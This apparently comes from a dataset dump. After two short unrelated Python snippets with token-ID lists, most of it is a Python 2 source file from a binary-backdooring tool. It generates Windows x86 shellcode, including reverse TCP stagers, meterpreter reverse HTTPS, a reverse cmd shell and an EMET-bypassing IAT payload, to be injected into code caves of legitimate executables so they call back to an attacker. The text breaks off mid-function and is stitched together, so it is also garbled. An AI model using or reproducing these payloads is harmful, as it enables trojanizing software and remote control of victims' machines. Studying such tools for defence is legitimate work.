import csv
from ruta import get_file_path
| [
11748,
269,
21370,
198,
198,
6738,
374,
29822,
1330,
651,
62,
7753,
62,
6978,
198
] | 2.866667 | 15 |
from rest_framework.permissions import BasePermission, IsAuthenticated
from media_management_api.media_service.models import CourseUser, UserProfile
import logging
logger = logging.getLogger(__name__)

# HTTP methods treated as read-only (never modify server state).
SAFE_METHODS = ('GET', 'HEAD', 'OPTIONS')
| [
6738,
1334,
62,
30604,
13,
525,
8481,
1330,
7308,
5990,
3411,
11,
1148,
47649,
3474,
198,
6738,
2056,
62,
27604,
62,
15042,
13,
11431,
62,
15271,
13,
27530,
1330,
20537,
12982,
11,
11787,
37046,
198,
198,
11748,
18931,
198,
6404,
1362,
... | 3.402778 | 72 |
'''
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
##########################################################
# BEGIN win32 shellcodes #
##########################################################
import struct
from intelmodules import eat_code_caves
class winI32_shellcode():
"""
Windows Intel x32 shellcode class
"""
def reverse_tcp_stager(self, flItms, CavesPicked={}):
"""
Reverse tcp stager. Can be used with windows/shell/reverse_tcp or
windows/meterpreter/reverse_tcp payloads from metasploit.
"""
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
flItms['stager'] = True
breakupvar = eat_code_caves(flItms, 0, 1)
#shellcode1 is the thread
self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
"\xBE\x22\x01\x00\x00" # <---Size of shellcode2 in hex
"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1"
)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += ("\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61"
)
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
else:
self.shellcode1 += "\xE9\x27\x01\x00\x00"
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
#Can inject any shellcode below.
self.shellcode2 += ("\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52"
"\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC"
"\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B"
"\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0"
"\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B\x01"
"\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03"
"\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C"
"\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B"
"\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D\x68"
"\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF"
"\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF"
"\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5"
"\x97\x6A\x05\x68"
)
self.shellcode2 += self.pack_ip_addresses() # IP
self.shellcode2 += ("\x68\x02\x00")
self.shellcode2 += struct.pack('!H', self.PORT)
self.shellcode2 += ("\x89\xE6\x6A"
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E"
"\x08\x75\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57"
"\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00"
"\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53"
"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
    def cave_miner(self, flItms, CavesPicked={}):
        """
        Sample code for finding suitable code caves.

        Emits NOP-sled ("\x90") stubs instead of a real payload so the chosen
        caves -- and the optional jump between them -- can be inspected in the
        patched binary.

        :param flItms: dict of per-file patching state; reads 'cave_jumping'.
        :param CavesPicked: caves selected for this payload.  Unused here but
            kept so every payload method shares one signature.
            NOTE(review): mutable default argument; harmless because it is
            never mutated, but a ``None`` default would be safer.
        :return: tuple ``(stackpreserve + shellcode1, shellcode2 + stackrestore)``;
            also stores the full concatenation on ``self.shellcode``.
        """
        # Distance between the two selected code caves (helper defined at
        # module level elsewhere in this file).
        breakupvar = eat_code_caves(flItms, 0, 1)
        self.shellcode1 = ""
        if flItms['cave_jumping'] is True:
            # 0xE9 = x86 JMP rel32; the 4-byte displacement is appended below.
            self.shellcode1 += "\xe9"
            if breakupvar > 0:
                if len(self.shellcode1) < breakupvar:
                    # Forward jump: cave distance minus the bytes already in
                    # front of the jump target (stack-preserve prologue, the
                    # opcode emitted so far, and the 4-byte operand itself).
                    self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
                                                   len(self.shellcode1) - 4).rstrip("L")), 16))
                else:
                    self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
                                                   breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
            else:
                # Negative distance: encode the backward jump as a two's
                # complement 32-bit displacement.
                self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
                                               len(self.shellcode1) - 3)
        #else:
        #    self.shellcode1 += "\x89\x00\x00\x00"
        # Both stubs are pure NOP sleds -- this payload only demonstrates
        # cave selection, it performs no action at runtime.
        self.shellcode1 += ("\x90" * 40
                            )
        self.shellcode2 = ("\x90" * 48
                           )
        self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
        return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def user_supplied_shellcode(self, flItms, CavesPicked={}):
"""
This module allows for the user to provide a win32 raw/binary
shellcode. For use with the -U flag. Make sure to use a process safe exit function.
"""
flItms['stager'] = True
if flItms['supplied_shellcode'] is None:
print "[!] User must provide shellcode for this module (-U)"
return False
else:
self.supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
"\xBE")
self.shellcode1 += struct.pack("<H", len(self.supplied_shellcode) + 5)
self.shellcode1 += ("\x00\x00"
"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1"
)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += ("\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61"
)
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
#else:
# self.shellcode1 += "\xEB\x06\x01\x00\x00"
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
#Can inject any shellcode below.
self.shellcode2 += self.supplied_shellcode
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def meterpreter_reverse_https(self, flItms, CavesPicked={}):
"""
Traditional meterpreter reverse https shellcode from metasploit
modified to support cave jumping.
"""
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
flItms['stager'] = True
breakupvar = eat_code_caves(flItms, 0, 1)
#shellcode1 is the thread
self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
)
self.shellcode1 += "\xBE"
self.shellcode1 += struct.pack("<H", 361 + len(self.HOST))
self.shellcode1 += "\x00\x00" # <---Size of shellcode2 in hex
self.shellcode1 += ("\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1"
)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += ("\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61"
)
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
else:
self.shellcode1 += "\xE9"
self.shellcode1 += struct.pack("<H", 361 + len(self.HOST))
self.shellcode1 += "\x00\x00" # <---length shellcode2 + 5
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
self.shellcode2 += ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68"
"\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57"
"\x57\x57\x57\x6a\x00\x54\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x5f"
"\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68")
self.shellcode2 += struct.pack("<H", self.PORT)
self.shellcode2 += ("\x00\x00\x53"
"\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x48\x59\x31\xd2\x52\x68"
"\x00\x32\xa0\x84\x52\x52\x52\x51\x52\x50\x68\xeb\x55\x2e\x3b"
"\xff\xd5\x89\xc6\x6a\x10\x5b\x68\x80\x33\x00\x00\x89\xe0\x6a"
"\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86\xff\xd5\x31\xff\x57"
"\x57\x57\x57\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1a"
"\x4b\x74\x10\xeb\xd5\xeb\x49\xe8\xb3\xff\xff\xff\x2f\x48\x45"
"\x56\x79\x00\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00"
"\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff"
"\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68"
"\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcd\x8b\x07\x01\xc3\x85"
"\xc0\x75\xe5\x58\xc3\xe8\x51\xff\xff\xff")
self.shellcode2 += self.HOST
self.shellcode2 += "\x00"
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def reverse_shell_tcp(self, flItms, CavesPicked={}):
"""
Modified metasploit windows/shell_reverse_tcp shellcode
to enable continued execution and cave jumping.
"""
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = "\xfc\xe8"
if flItms['cave_jumping'] is True:
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\x89\x00\x00\x00"
self.shellcode1 += ("\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86"
)
self.shellcode2 = ("\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x68"
)
self.shellcode2 += self.pack_ip_addresses() # IP
self.shellcode2 += ("\x68\x02\x00")
self.shellcode2 += struct.pack('!H', self.PORT) # PORT
self.shellcode2 += ("\x89\xe6\x6a\x10\x56"
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
#The NOP in the line below allows for continued execution.
"\xe0\x4e\x90\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
"\x81\xc4\xfc\x01\x00\x00"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def iat_reverse_tcp(self, flItms, CavesPicked={}):
"""
Position dependent shellcode that uses API thunks of LoadLibraryA and
GetProcAddress to find and load APIs for callback to C2.
Bypasses EMET 4.1. Idea from Jared DeMott:
http://labs.bromium.com/2014/02/24/bypassing-emet-4-1/
via @bannedit0 (twitter handle)
"""
flItms['apis_needed'] = ['LoadLibraryA', 'GetProcAddress']
for api in flItms['apis_needed']:
if api not in flItms:
return False
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
self.shellcode1 = "\xfc" # CLD
self.shellcode1 += "\xbb" # mov value below to EBX
if flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack("<I", 0xffffffff + (flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack("<I", flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
self.shellcode1 += "\x01\xD3" # add EBX + EDX
self.shellcode1 += "\xb9" # mov value below to ECX
if flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack("<I", 0xffffffff + (flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack("<I", flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
self.shellcode1 += "\x01\xD1" # add ECX + EDX
self.shellcode1 += ("\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x87\xF1\xFF\x13\x68"
"\x75\x70\x00\x00\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x50"
"\x97\xFF\x16\x95\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\xFF\xD5\x68"
"\x74\x41\x00\x00\x68\x6F\x63\x6B\x65\x68\x57\x53\x41\x53\x54\x57"
"\xFF\x16\x95\x31\xC0\x50\x50\x50\x50\x40\x50\x40\x50\xFF\xD5\x95"
